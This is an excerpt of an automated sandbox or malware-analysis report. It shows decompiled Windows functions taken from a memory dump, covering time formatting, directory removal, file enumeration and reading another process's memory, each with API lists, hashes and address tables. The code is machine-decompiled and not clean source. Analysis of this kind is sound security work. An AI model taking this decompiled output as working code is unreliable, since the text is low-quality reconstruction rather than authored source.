                                • Instruction Fuzzy Hash: 2302B3F090511AAFEB219F60CF44EA9BBB8EF45318F014196E708E6165FB319E91CF15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55D701, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 217timeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 54%
                                			E4A55D701(void* __esi, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				short _v72;
				short _v328;
				signed int _v332;
				signed short _v334;
				signed short _v336;
				signed int _v338;
				signed int _v340;
				struct _SYSTEMTIME _v348;
				signed int _v352;
				struct _FILETIME _v360;
				struct _FILETIME _v368;
				void* __ebx;
				void* __edi;
				signed int _t54;
				signed int _t64;
				signed int _t68;
				signed int _t71;
				signed int _t75;
				int _t84;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t92;
				signed int _t98;
				int _t103;
				signed int _t108;
				signed int _t109;
				signed int _t112;
				signed int _t113;
				void* _t115;
				signed int _t116;
				signed int _t117;
				void _t118;
				void* _t119;
				void* _t121;
				signed int _t122;
				void* _t123;

				_t119 = __esi;
				_t54 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t54 ^ _t122;
				_t56 = _a4;
				_t117 = _a12;
				_v352 = _t117;
				if(_a4 != 0) {
					E4A5630B6(_t56,  &_v360);
				} else {
					GetSystemTime( &_v348);
					SystemTimeToFileTime( &_v348,  &_v360);
				}
				FileTimeToLocalFileTime( &_v360,  &_v368);
				FileTimeToSystemTime( &_v368,  &_v348);
				if(_a8 != 1) {
					__eflags =  *0x4a574081;
					_t103 = 2;
					if( *0x4a574081 == 0) {
						__eflags =  *0x4a574090;
						_t64 = _v340 & 0x0000ffff;
						_t116 = 0x4a574bc0;
						if( *0x4a574090 == 0) {
							_t116 = E4A5525B8;
						} else {
							_t109 = 0xc;
							__eflags = _t64 - _t109;
							if(__eflags < 0) {
								__eflags = _t64;
								if(_t64 == 0) {
									_t64 = _t109;
								}
							} else {
								if(__eflags > 0) {
									__eflags = _t64;
								}
								_t116 = 0x4a574b80;
							}
						}
						_push(_t116);
						_push(_v338 & 0x0000ffff);
						_push(0x4a574950);
						E4A55179D( &_v72, 0x20, L"%02d%s%02d%s", _t64);
						L26:
						_push( &_v72);
						__eflags = _t117;
						if(_t117 == 0) {
							_t68 = E4A55C5A0();
							goto L7;
						}
						_push(_a16);
						_push(_t117);
						E4A55185A();
						_t71 = _t117;
						_t116 = _t71 + 2;
						do {
							_t108 =  *_t71;
							_t71 = _t71 + _t103;
							__eflags = _t108;
						} while (_t108 != 0);
						goto L6;
					}
					_v332 = _v332 & 0x00000000;
					_push(_t119);
					_t34 = _t103 + 0x7e; // 0x80
					_t120 = _t34;
					_t75 = GetLocaleInfoW(E4A55756D(), 0x1003,  &_v328, _t34);
					__eflags = _t75;
					if(_t75 == 0) {
						E4A55185A( &_v328, _t120, L"HH:mm:ss t");
					}
					__eflags = _v328;
					_t121 =  &_v328;
					if(_v328 != 0) {
						do {
							_t118 =  *_t121 & 0x0000ffff;
							__eflags = _t118 - 0x27;
							if(_t118 == 0x27) {
								__eflags = _v332;
								_v332 = 0 | _v332 == 0x00000000;
								L10:
								_t121 = _t121 + _t103;
								__eflags = _t121;
								goto L11;
							}
							__eflags = _v332;
							if(_v332 != 0) {
								goto L10;
							}
							__eflags = _t118 - 0x68;
							if(_t118 == 0x68) {
								L17:
								_t85 = 0;
								__eflags = 0;
								do {
									_t121 = _t121 + _t103;
									_t85 = _t85 + 1;
									__eflags =  *_t121 - _t118;
								} while ( *_t121 == _t118);
								_t121 = _t121 +  ~_t85 * 2;
								__eflags = _t85 - 1;
								if(_t85 != 1) {
									goto L10;
								}
								_t86 = _t121;
								_t30 = _t86 + 2; // 0x2
								_t116 = _t30;
								goto L8;
								L8:
								_t112 =  *_t86;
								_t86 = _t86 + _t103;
								__eflags = _t112;
								if(_t112 != 0) {
									goto L8;
								} else {
									_t87 = _t86 - _t116;
									__eflags = _t87;
									_t26 = _t121 + 2; // 0x2
									memmove(_t26, _t121, (_t87 >> 1) + (_t87 >> 1) + 2);
									_t123 = _t123 + 0xc;
									 *_t121 = _t118;
									goto L10;
								}
							}
							__eflags = _t118 - 0x48;
							if(_t118 == 0x48) {
								goto L17;
							}
							__eflags = _t118 - 0x6d;
							if(_t118 != 0x6d) {
								goto L11;
							}
							goto L17;
							L11:
							_t121 = _t121 + _t103;
							__eflags =  *_t121;
						} while ( *_t121 != 0);
						_t117 = _v352;
						goto L25;
					} else {
						L25:
						_t84 = GetTimeFormatW(E4A55756D(), _t103,  &_v348,  &_v328,  &_v72, 0x20);
						_pop(_t119);
						__eflags = _t84;
						if(_t84 == 0) {
							_v72 = _t84;
						}
						goto L26;
					}
				} else {
					_t92 = _v334 & 0x0000ffff;
					_t113 = 0xa;
					asm("cdq");
					_t116 = _t92 % _t113;
					_push(_t92 / _t113);
					_push(0x4a574930);
					_push(_v336 & 0x0000ffff);
					_push(0x4a574950);
					_push(_v338 & 0x0000ffff);
					_push(0x4a574950);
					_push(_v340 & 0x0000ffff);
					_push(L"%2d%s%02d%s%02d%s%02d");
					if(_t117 == 0) {
						_t68 = E4A5558F3();
						goto L7;
					} else {
						_push(_a16);
						_push(_t117);
						E4A55179D();
						_t98 = _t117;
						_t116 = _t98 + 2;
						_t103 = 2;
						do {
							_t115 =  *_t98;
							_t98 = _t98 + _t103;
						} while (_t115 != 0);
						L6:
						_t68 = _t71 - _t116 >> 1;
						L7:
						return E4A5513A9(_t68, _t103, _v8 ^ _t122, _t116, _t117, _t119);
					}
				}
			}









































                                0x4a55d701
                                0x4a55d70c
                                0x4a55d713
                                0x4a55d716
                                0x4a55d71b
                                0x4a55d71e
                                0x4a55d726
                                0x4a5630a7
                                0x4a55d72c
                                0x4a55d733
                                0x4a55d747
                                0x4a55d747
                                0x4a55d75b
                                0x4a55d76f
                                0x4a55d779
                                0x4a562add
                                0x4a562ae6
                                0x4a562ae7
                                0x4a56508b
                                0x4a565092
                                0x4a565099
                                0x4a56509e
                                0x4a5650ba
                                0x4a5650a0
                                0x4a5650a2
                                0x4a5650a3
                                0x4a5650a5
                                0x4a5650b2
                                0x4a5650b4
                                0x4a5650b6
                                0x4a5650b6
                                0x4a5650a7
                                0x4a5650a7
                                0x4a5650a9
                                0x4a5650a9
                                0x4a5650ab
                                0x4a5650ab
                                0x4a5650a5
                                0x4a5650c6
                                0x4a5650c7
                                0x4a5650c8
                                0x4a5650d9
                                0x4a562b57
                                0x4a562b5a
                                0x4a562b5b
                                0x4a562b5d
                                0x4a5650e6
                                0x00000000
                                0x4a5650e6
                                0x4a562b63
                                0x4a562b66
                                0x4a562b67
                                0x4a562b6c
                                0x4a562b6e
                                0x4a562b71
                                0x4a562b71
                                0x4a562b74
                                0x4a562b76
                                0x4a562b76
                                0x00000000
                                0x4a562b7b
                                0x4a562aed
                                0x4a562af4
                                0x4a562af5
                                0x4a562af5
                                0x4a562b0b
                                0x4a562b11
                                0x4a562b13
                                0x4a565062
                                0x4a565062
                                0x4a562b19
                                0x4a562b21
                                0x4a562b27
                                0x4a562a90
                                0x4a562a90
                                0x4a562a93
                                0x4a562a97
                                0x4a56506e
                                0x4a565077
                                0x4a562a86
                                0x4a562a86
                                0x4a562a86
                                0x00000000
                                0x4a562a86
                                0x4a562a9d
                                0x4a562aa4
                                0x00000000
                                0x00000000
                                0x4a562aa6
                                0x4a562aaa
                                0x4a562ab8
                                0x4a562ab8
                                0x4a562ab8
                                0x4a562aba
                                0x4a562aba
                                0x4a562abc
                                0x4a562abd
                                0x4a562abd
                                0x4a562ac6
                                0x4a562ac9
                                0x4a562acc
                                0x00000000
                                0x00000000
                                0x4a562ace
                                0x4a562ad0
                                0x4a562ad0
                                0x4a562ad3
                                0x4a562a62
                                0x4a562a62
                                0x4a562a65
                                0x4a562a67
                                0x4a562a6a
                                0x00000000
                                0x4a562a6c
                                0x4a562a6c
                                0x4a562a6c
                                0x4a562a75
                                0x4a562a7a
                                0x4a562a80
                                0x4a562a83
                                0x00000000
                                0x4a562a83
                                0x4a562a6a
                                0x4a562aac
                                0x4a562ab0
                                0x00000000
                                0x00000000
                                0x4a562ab2
                                0x4a562ab6
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a562a88
                                0x4a562a88
                                0x4a562a8a
                                0x4a562a8a
                                0x4a562ad5
                                0x00000000
                                0x4a562b2d
                                0x4a562b2d
                                0x4a562b48
                                0x4a562b4e
                                0x4a562b4f
                                0x4a562b51
                                0x4a565082
                                0x4a565082
                                0x00000000
                                0x4a562b51
                                0x4a55d77f
                                0x4a55d77f
                                0x4a55d788
                                0x4a55d789
                                0x4a55d78a
                                0x4a55d793
                                0x4a55d79b
                                0x4a55d7a0
                                0x4a55d7a6
                                0x4a55d7a7
                                0x4a55d7a8
                                0x4a55d7b0
                                0x4a55d7b1
                                0x4a55d7b8
                                0x4a565048
                                0x00000000
                                0x4a55d7be
                                0x4a55d7be
                                0x4a55d7c1
                                0x4a55d7c2
                                0x4a55d7ca
                                0x4a55d7ce
                                0x4a55d7d1
                                0x4a55d7d2
                                0x4a55d7d2
                                0x4a55d7d5
                                0x4a55d7d7
                                0x4a55d7dc
                                0x4a55d7de
                                0x4a55d7e0
                                0x4a55d7ed
                                0x4a55d7ed
                                0x4a55d7b8

                                APIs
                                • GetSystemTime.KERNEL32(?,00002000,74CBA9E9), ref: 4A55D733
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 4A55D747
                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 4A55D75B
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 4A55D76F
                                • GetLocaleInfoW.KERNEL32(00000000,00001003,?,00000080,4A580640), ref: 4A562B0B
                                • GetTimeFormatW.KERNEL32(00000000,00000002,?,00000000,?,00000020), ref: 4A562B48
                                  • Part of subcall function 4A55179D: _vsnwprintf.MSVCRT ref: 4A5517CB
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Time$File$System$FormatInfoLocalLocale_vsnwprintf
                                • String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                                • API String ID: 1064561440-2516506544
                                • Opcode ID: b2762fe4a0b16618622b8542f8a31305af9c207079cb769ed3a71def80babfb6
                                • Instruction ID: b4ae7e7a46c0da91ab081d561c813264e8405edf2a655f3eaa30710b61775651
                                • Opcode Fuzzy Hash: b2762fe4a0b16618622b8542f8a31305af9c207079cb769ed3a71def80babfb6
                                • Instruction Fuzzy Hash: 2971B37290121AEBDB209FA4DE44BEE77BCEF48711F014496E50DEB154E7B4DA84CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A570202, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 66COMMON
                                Download Yara Rule
                                C-Code - Quality: 70%
                                			E4A570202(void* __ebx, void* __edi, WCHAR* _a4) {
				signed int _v8;
				short _v12;
				short _v14;
				short _v16;
				signed int _v20;
				WCHAR* _v24;
				void* __esi;
				signed int _t17;
				signed int _t23;
				long _t25;
				signed int _t26;
				void* _t31;
				void* _t35;
				void* _t36;
				WCHAR* _t38;
				signed int _t39;

				_t36 = __edi;
				_t31 = __ebx;
				_t17 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t17 ^ _t39;
				_v20 = _v20 & 0x00000000;
				_t38 = _a4;
				if(GetFullPathNameW(_t38, 4,  &_v16,  &_v24) != 3 || _v14 != 0x3a || _v12 != 0x5c) {
					_push(_t31);
					if(RemoveDirectoryW(_t38) == 0) {
						_push(_t36);
						_t25 = GetLastError();
						_v20 = _t25;
						if(_t25 == 5) {
							_t26 = GetFileAttributesW(_t38);
							if(_t26 != 0xffffffff && (_t26 & 0x00000001) != 0 && SetFileAttributesW(_t38, _t26 & 0xfffffffe) != 0) {
								if(RemoveDirectoryW(_t38) == 0) {
									_v20 = GetLastError();
								} else {
									_v20 = _v20 & 0x00000000;
								}
							}
						}
						_pop(_t36);
					}
					_t23 = _v20;
					_pop(_t31);
				} else {
					_t23 = 0;
				}
				return E4A5513A9(_t23, _t31, _v8 ^ _t39, _t35, _t36, _t38);
			}



















                                0x4a570202
                                0x4a570202
                                0x4a57020a
                                0x4a570211
                                0x4a570214
                                0x4a570219
                                0x4a570230
                                0x4a570244
                                0x4a570250
                                0x4a570252
                                0x4a570259
                                0x4a57025b
                                0x4a570261
                                0x4a570264
                                0x4a57026d
                                0x4a570287
                                0x4a570291
                                0x4a570289
                                0x4a570289
                                0x4a570289
                                0x4a570287
                                0x4a57026d
                                0x4a570294
                                0x4a570294
                                0x4a570295
                                0x4a570298
                                0x4a570240
                                0x4a570240
                                0x4a570240
                                0x4a5702a5

                                APIs
                                • GetFullPathNameW.KERNEL32(4A5708D8,00000004,?,?,766F43D5), ref: 4A570227
                                • RemoveDirectoryW.KERNEL32(4A5708D8,?), ref: 4A57024C
                                • GetLastError.KERNEL32(00000104), ref: 4A570259
                                • GetFileAttributesW.KERNEL32(4A5708D8), ref: 4A570264
                                • SetFileAttributesW.KERNEL32(4A5708D8,00000000), ref: 4A570278
                                • RemoveDirectoryW.KERNEL32(4A5708D8), ref: 4A570283
                                • GetLastError.KERNEL32 ref: 4A57028F
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AttributesDirectoryErrorFileLastRemove$FullNamePath
                                • String ID: :$\
                                • API String ID: 4091459551-1166558509
                                • Opcode ID: a828eb5075b6f8f86609392f4c0db7893f56d475217a5e2e780ae58bd99fbde7
                                • Instruction ID: 910c674b2510e2f4acc4a0a992e4e7f9eb7c6f04676aaeac0573e7a972eea79e
                                • Opcode Fuzzy Hash: a828eb5075b6f8f86609392f4c0db7893f56d475217a5e2e780ae58bd99fbde7
                                • Instruction Fuzzy Hash: E811E67691121AABEB00ABE9CE44AAEBBFCBF46328F510516F015F2490D7F49E018764
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A552E73, Relevance: 15.1, APIs: 10, Instructions: 95COMMON
                                Download Yara Rule
                                C-Code - Quality: 88%
                                			E4A552E73(void* __ecx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, void** _a24) {
				void* _v5;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t26;
				void* _t28;
				signed int _t38;
				signed int _t40;
				void** _t45;

				_v5 = 0;
				_t22 = FindFirstFileExW(_a8, 0 | _a16 == 0x00000000, _a20, 0, 0, 2);
				_t45 = _a24;
				 *_t45 = _t22;
				if(_t22 != 0xffffffff) {
					while(1) {
						_t23 = _a4(_a20, _a12);
						__eflags = _t23;
						if(_t23 != 0) {
							break;
						}
						_t24 = FindNextFileW( *_t45, _a20);
						__eflags = _t24;
						if(_t24 == 0) {
							FindClose( *_t45);
							 *_t45 =  *_t45 | 0xffffffff;
							L6:
							__eflags =  *_t45 - 0xffffffff;
							if( *_t45 == 0xffffffff) {
								L12:
								__eflags = _v5;
								if(_v5 != 0) {
									L2:
									_t26 = _v5;
									L3:
									return _t26;
								}
								goto L1;
							}
							_t28 =  *0x4a57412c; // 0x0
							__eflags = _t28;
							if(_t28 == 0) {
								_t28 = HeapAlloc(GetProcessHeap(), 0, 0x14);
								L14:
								 *0x4a57412c = _t28;
								L9:
								__eflags = _t28;
								if(_t28 != 0) {
									_t40 =  *0x4a574134; // 0x0
									 *(_t28 + _t40 * 4) =  *_t45;
									 *0x4a574134 =  *0x4a574134 + 1;
									__eflags =  *0x4a574134;
								}
								_v5 = 1;
								goto L12;
							}
							_t38 =  *0x4a574134; // 0x0
							__eflags = _t38 -  *0x4a574130; // 0x0
							if(__eflags >= 0) {
								_t28 = HeapReAlloc(GetProcessHeap(), 0, _t28, 4 + _t38 * 4);
								__eflags = _t28;
								if(_t28 == 0) {
									 *0x4a574128 = GetLastError();
									FindClose( *_t45);
									 *_t45 =  *_t45 | 0xffffffff;
									_t26 = 0;
									goto L3;
								}
								 *0x4a574130 =  *0x4a574130 + 1;
								goto L14;
							}
							goto L9;
						}
						__eflags =  *_t45 - 0xffffffff;
						if( *_t45 != 0xffffffff) {
							continue;
						}
						goto L6;
					}
					 *0x4a574128 = 0;
					_v5 = 1;
					goto L6;
				}
				L1:
				 *0x4a574128 = GetLastError();
				goto L2;
			}












                                0x4a552e8d
                                0x4a552e94
                                0x4a552e9a
                                0x4a552e9d
                                0x4a552ea2
                                0x4a552eeb
                                0x4a552ef1
                                0x4a552efa
                                0x4a552efc
                                0x00000000
                                0x00000000
                                0x4a55fd5b
                                0x4a55fd61
                                0x4a55fd63
                                0x4a560e83
                                0x4a560e85
                                0x4a552f0c
                                0x4a552f0c
                                0x4a552f0f
                                0x4a552f49
                                0x4a552f49
                                0x4a552f4c
                                0x4a552eaf
                                0x4a552eaf
                                0x4a552eb2
                                0x4a552eb6
                                0x4a552eb6
                                0x00000000
                                0x4a552f52
                                0x4a552f11
                                0x4a552f16
                                0x4a552f18
                                0x4a5575bb
                                0x4a5575a7
                                0x4a5575a7
                                0x4a552f30
                                0x4a552f30
                                0x4a552f32
                                0x4a552f36
                                0x4a552f3c
                                0x4a552f3f
                                0x4a552f3f
                                0x4a552f3f
                                0x4a552f45
                                0x00000000
                                0x4a552f45
                                0x4a552f1e
                                0x4a552f24
                                0x4a552f2a
                                0x4a5575f1
                                0x4a5575f7
                                0x4a5575f9
                                0x4a56b278
                                0x4a56b27f
                                0x4a56b281
                                0x4a56b284
                                0x00000000
                                0x4a56b284
                                0x4a5575ff
                                0x00000000
                                0x4a5575ff
                                0x00000000
                                0x4a552f2a
                                0x4a55fd69
                                0x4a55fd6c
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55fd72
                                0x4a552f02
                                0x4a552f08
                                0x00000000
                                0x4a552f08
                                0x4a552ea4
                                0x4a552eaa
                                0x00000000

                                APIs
                                • FindFirstFileExW.KERNEL32(00000004,00000000,?,00000000,00000000,00000002,00000000,00000000,00000000,?,?,4A559D97,4A559D6F,?,00000000,4A559BCF), ref: 4A552E94
                                • GetLastError.KERNEL32(?,4A559D97,4A559D6F,?,00000000,4A559BCF,00000004,?,?,4A559BCF,?,00000004,?,00000000), ref: 4A552EA4
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ErrorFileFindFirstLast
                                • String ID:
                                • API String ID: 873889042-0
                                • Opcode ID: 44734dc6003934244a58c071c37573c3a8728ed92c57440943367e0b188ede59
                                • Instruction ID: 3262e5160ed6d3ced3b8510120789301f18b68da6bec3cadc357c67abe78daae
                                • Opcode Fuzzy Hash: 44734dc6003934244a58c071c37573c3a8728ed92c57440943367e0b188ede59
                                • Instruction Fuzzy Hash: 8531DEB4541201EFDB10AFA1DA489693FBCFF16365F100A2BF592E69A8C3318C45CF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56D539, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 101libraryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E4A56D539(void _a4) {
				void _v8;
				void _v12;
				long _v16;
				void* _v36;
				char _v40;
				signed short _v444;
				intOrPtr _v480;
				intOrPtr _v616;
				void _v624;
				intOrPtr* _t27;
				void* _t30;
				void* _t41;
				struct HINSTANCE__* _t44;
				void* _t59;
				signed int _t64;

				_v8 = 0;
				_t64 =  *0x4a59092c; // 0x0
				if(_t64 == 0) {
					_t44 = LoadLibraryW(L"NTDLL.DLL");
					 *0x4a59092c = _t44;
					if(_t44 == 0) {
						 *0x4a59092c =  *0x4a59092c | 0xffffffff;
					} else {
						 *0x4a590928 = GetProcAddress(_t44, "NtQueryInformationProcess");
					}
				}
				_t27 =  *0x4a590928; // 0x0
				if(_t27 == 0) {
					L16:
					return _v8;
				}
				_t59 = _a4;
				_push(0);
				_push(0x18);
				_push( &_v40);
				_push(0);
				_push(_t59);
				if( *_t27() < 0) {
					L15:
					goto L16;
				}
				_t30 = _v36;
				_a4 = _t30;
				if(ReadProcessMemory(_t59, _t30,  &_v624, 0x248,  &_v16) != 0) {
					if(_v16 < 0xb4 || _v480 - _a4 <= 0xb4) {
						if(ReadProcessMemory(_t59, _v616 + 0x3c,  &_a4, 4, 0) != 0 && ReadProcessMemory(_t59, _v616 + _a4 + 4,  &_v12, 2, 0) != 0) {
							_t41 = E4A56D3B9(_v616 + _a4 + 0x18, _v12);
							if(_t41 != 0) {
								ReadProcessMemory(_t59, _t41,  &_v8, 2, 0);
							}
						}
					} else {
						_v8 = _v444 & 0x0000ffff;
					}
				}
				goto L15;
			}


















                                0x4a56d547
                                0x4a56d54a
                                0x4a56d550
                                0x4a56d557
                                0x4a56d55d
                                0x4a56d564
                                0x4a56d579
                                0x4a56d566
                                0x4a56d572
                                0x4a56d572
                                0x4a56d564
                                0x4a56d580
                                0x4a56d587
                                0x4a56d646
                                0x4a56d64c
                                0x4a56d64c
                                0x4a56d58e
                                0x4a56d591
                                0x4a56d592
                                0x4a56d597
                                0x4a56d598
                                0x4a56d599
                                0x4a56d59e
                                0x4a56d645
                                0x00000000
                                0x4a56d645
                                0x4a56d5a4
                                0x4a56d5c0
                                0x4a56d5c7
                                0x4a56d5d1
                                0x4a56d602
                                0x4a56d630
                                0x4a56d637
                                0x4a56d642
                                0x4a56d642
                                0x4a56d637
                                0x4a56d5e0
                                0x4a56d5e7
                                0x4a56d5e7
                                0x4a56d5d1
                                0x00000000

                                APIs
                                • LoadLibraryW.KERNEL32(NTDLL.DLL,00000000), ref: 4A56D557
                                • GetProcAddress.KERNEL32(00000000,NtQueryInformationProcess), ref: 4A56D56C
                                • ReadProcessMemory.KERNEL32(00000001,?,?,00000248,?,?), ref: 4A56D5C3
                                • ReadProcessMemory.KERNEL32(00000001,?,00000001,00000004,00000000), ref: 4A56D5FE
                                • ReadProcessMemory.KERNEL32(00000001,?,00000001,00000002,00000000), ref: 4A56D61A
                                • ReadProcessMemory.KERNEL32(00000001,00000000,?,00000002,00000000), ref: 4A56D642
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                • String ID: NTDLL.DLL$NtQueryInformationProcess
                                • API String ID: 1580871199-2613899276
                                • Opcode ID: b635da1ea51f02a3eabd770087d3e338e36379fcd893a458f4074d19284e80a4
                                • Instruction ID: a3ff0cb26e8190be2f85ba576eb1f961aaa66030aa7b7625e393c1be10934e6b
                                • Opcode Fuzzy Hash: b635da1ea51f02a3eabd770087d3e338e36379fcd893a458f4074d19284e80a4
                                • Instruction Fuzzy Hash: F93181B6901209ABEB00DFA4CE85DBE7B7CAB69344F10495AF50AD7540D770EE41CF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55BBA4, Relevance: 12.2, APIs: 8, Instructions: 240COMMON
                                Download Yara Rule
                                C-Code - Quality: 66%
                                			E4A55BBA4(void* __edi, WCHAR* _a4, intOrPtr _a8, signed int* _a12) {
				signed int _v8;
				char _v528;
				struct _WIN32_FIND_DATAW _v1120;
				void* _v1124;
				signed int _v1128;
				char _v1132;
				WCHAR* _v1136;
				void* __ebx;
				void* __esi;
				signed int _t52;
				WCHAR* _t54;
				short _t59;
				WCHAR* _t61;
				signed int _t65;
				signed char _t66;
				WCHAR* _t69;
				WCHAR* _t73;
				void* _t75;
				intOrPtr* _t76;
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr* _t88;
				intOrPtr* _t92;
				signed int _t95;
				intOrPtr* _t98;
				signed int* _t111;
				short _t112;
				short _t115;
				short _t118;
				short _t119;
				short _t120;
				intOrPtr _t124;
				intOrPtr _t125;
				short _t127;
				short* _t128;
				void* _t129;
				int _t131;
				WCHAR* _t132;
				signed int _t134;

				_t129 = __edi;
				_t52 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t52 ^ _t134;
				_t111 = _a12;
				_t132 = _a4;
				_t54 = _t132;
				_v1136 = _t132;
				_t5 =  &(_t54[1]); // 0x2
				_t128 = _t5;
				do {
					_t112 =  *_t54;
					_t54 =  &(_t54[1]);
				} while (_t112 != 0);
				if((_t54 - _t128 >> 1) + 2 > _a8) {
					L9:
					_t59 = 0;
					L8:
					return E4A5513A9(_t59, _t111, _v8 ^ _t134, _t128, _t129, _t132);
				}
				_t61 = _t132;
				_t7 =  &(_t61[1]); // 0x2
				_t128 = _t7;
				do {
					_t115 =  *_t61;
					_t61 =  &(_t61[1]);
				} while (_t115 != 0);
				_t65 = (_t61 - _t128 >> 1) + 0xfffffffe;
				_v1128 = _t65;
				 *_t111 = _t65;
				_t66 = GetFileAttributesW(_t132);
				if(_t66 == 0xffffffff) {
					_push(0);
					_push(GetLastError());
					E4A556D44(_t115);
					goto L9;
				}
				if((_t66 & 0x00000010) != 0) {
					_t69 = _t132;
					_t12 =  &(_t69[1]); // 0x2
					_t128 = _t12;
					do {
						_t118 =  *_t69;
						_t69 =  &(_t69[1]);
					} while (_t118 != 0);
					_t73 =  &(_t132[_t69 - _t128 >> 1]);
					if( *((short*)(_t73 - 2)) != 0x5c) {
						_t119 = 0x5c;
						 *_t73 = _t119;
						_t120 = 0x2a;
						_t73[1] = _t120;
						_t121 = 0;
						_t73[2] = 0;
					} else {
						_t127 = 0x2a;
						 *_t73 = _t127;
						_t121 = 0;
						_t73[1] = 0;
					}
					_t75 = FindFirstFileW(_t132,  &_v1120);
					_v1124 = _t75;
					if(_t75 != 0xffffffff) {
						_push(_t129);
						_t131 = 1;
						do {
							_t121 = E4A552EC4;
							_t76 =  &(_v1120.cFileName);
							while(1) {
								_t128 =  *_t76;
								if(_t128 !=  *_t121) {
									break;
								}
								if(_t128 == 0) {
									L25:
									_t76 = 0;
									L27:
									if(_t76 == 0) {
										goto L53;
									}
									_t121 = E4A552EBC;
									_t83 =  &(_v1120.cFileName);
									while(1) {
										_t128 =  *_t83;
										if(_t128 !=  *_t121) {
											break;
										}
										if(_t128 == 0) {
											L33:
											_t83 = 0;
											L35:
											if(_t83 == 0) {
												goto L53;
											}
											_t84 =  &(_v1120.cFileName);
											_t128 = _t84 + 2;
											do {
												_t121 =  *_t84;
												_t84 = _t84 + 2;
											} while (_t121 != 0);
											if(_t84 == _t128) {
												goto L53;
											}
											if((_v1120.dwFileAttributes & 0x00000010) != 0) {
												_t88 =  &(_v1120.cFileName);
												_t128 = _t88 + 2;
												do {
													_t124 =  *_t88;
													_t88 = _t88 + 2;
												} while (_t124 != 0);
												_t121 =  *_t111;
												if(_t121 <= _t88 - _t128 >> 1) {
													_t92 =  &(_v1120.cFileName);
													_t128 = _t92 + 2;
													do {
														_t121 =  *_t92;
														_t92 = _t92 + 2;
													} while (_t121 != 0);
													_t95 = _t92 - _t128 >> 1;
													L52:
													 *_t111 = _t95;
													goto L53;
												}
												L48:
												_t95 = _t121;
												goto L52;
											}
											E4A55185A( &_v528, 0x104, _v1136);
											_t98 =  &_v528;
											_t128 = _t98 + 2;
											do {
												_t125 =  *_t98;
												_t98 = _t98 + 2;
											} while (_t125 != 0);
											_t121 = 0;
											 *((short*)(_t134 + (_t98 - _t128 >> 1) * 2 - 0x20e)) = 0;
											E4A5520A9(0x104,  &_v528, 0x104,  &(_v1120.cFileName));
											if(E4A55BBA4(_t131,  &_v528, 0x104,  &_v1132) == 0) {
												goto L54;
											}
											_t95 = _v1132 + _v1128;
											_t121 =  *_t111;
											if(_t121 > _t95) {
												goto L48;
											}
											goto L52;
										}
										_t128 =  *((intOrPtr*)(_t83 + 2));
										_t26 = _t121 + 2; // 0x2e
										if(_t128 !=  *_t26) {
											break;
										}
										_t83 = _t83 + 4;
										_t121 = _t121 + 4;
										if(_t128 != 0) {
											continue;
										}
										goto L33;
									}
									asm("sbb eax, eax");
									asm("sbb eax, 0xffffffff");
									goto L35;
								}
								_t128 =  *((intOrPtr*)(_t76 + 2));
								_t23 = _t121 + 2; // 0x5c0000
								if(_t128 !=  *_t23) {
									break;
								}
								_t76 = _t76 + 4;
								_t121 = _t121 + 4;
								if(_t128 != 0) {
									continue;
								}
								goto L25;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L27;
							L53:
							_t131 = FindNextFileW(_v1124,  &_v1120);
						} while (_t131 != 0);
						L54:
						_t132 = GetLastError();
						FindClose(_v1124);
						_pop(_t129);
						if(_t131 != 0) {
							goto L9;
						}
						L55:
						if(_t132 == 0x12) {
							goto L7;
						}
						_push(0);
						_push(_t132);
						E4A556D44(_t121);
						_t59 = 0;
						goto L8;
					}
					_t132 = GetLastError();
					FindClose(0xffffffff);
					if(_t132 == 2) {
						goto L7;
					}
					goto L55;
				}
				L7:
				_t59 = 1;
				goto L8;
			}










































                                0x4a55bba4
                                0x4a55bbaf
                                0x4a55bbb6
                                0x4a55bbba
                                0x4a55bbbe
                                0x4a55bbc1
                                0x4a55bbc3
                                0x4a55bbc9
                                0x4a55bbc9
                                0x4a55bbcc
                                0x4a55bbcc
                                0x4a55bbd0
                                0x4a55bbd1
                                0x4a55bbe0
                                0x4a565b21
